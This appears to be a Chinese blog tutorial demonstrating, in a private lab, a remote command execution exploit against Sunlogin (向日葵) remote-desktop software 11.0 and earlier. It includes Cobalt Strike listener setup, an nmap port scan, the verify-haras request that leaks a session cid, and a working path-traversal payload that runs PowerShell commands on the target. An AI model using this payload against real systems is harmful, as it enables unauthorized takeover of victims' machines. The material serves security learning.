CS学习 | 嘿哟博客

演示一下向日葵rce漏洞,以下内容仅作学习使用，严禁用作网上攻击

向日葵版本≤11.0

服务器/攻击机: 192.168.111.129

建议使用kali，一些工具可以直接使用

靶机: 192.168.111.128

启动攻击机

# 先在启动攻击机下的软件
cobaltstrike.bat
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[CSAgent] load translation resource

配置监听器

点击Cobalt Strike后，点击展开中的监听器，然后添加，按照123点击

新建监听器

监听器名称，随便设置
服务器/攻击机的ip，也可以服务器和攻击机不同ip
监听的端口，不能设置和已有端口相同

启动靶机上的向日葵

向日葵

版本需要使用11.0，最新版已修复此漏洞

# 利用kali中nmap扫描，扫描向日葵所在目标机IP，查看开放端口
nmap 192.168.111.129 -p 40000-65535

# 以下所示，端口49749
Host is up (0.0013s latency).
Not shown: 25535 filtered tcp ports (no-response)
PORT      STATE SERVICE
49749/tcp open  unknown

通过浏览器访问ip+端口，直到出现如下图所示，出现JSON信息

IP:端口

通过向日葵端口执行命令

获取cid值

可以使用火狐的插件HackBar来注入获取，也可以用burp抓包

尝试获取session，测试靶机是否存在/cgi-bin/rpc界面

1	IP:端口/cgi-bin/rpc

1	IP:端口/cgi-bin/rpc?action=verify-haras

得到cid值 dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3，拷贝下来后面需要用到

执行exp

右击打开检查，使用HackBar注入cid值

ipconfig返回值

1
2
3

IP:端口/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20ipconfig

/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20（执行的命令）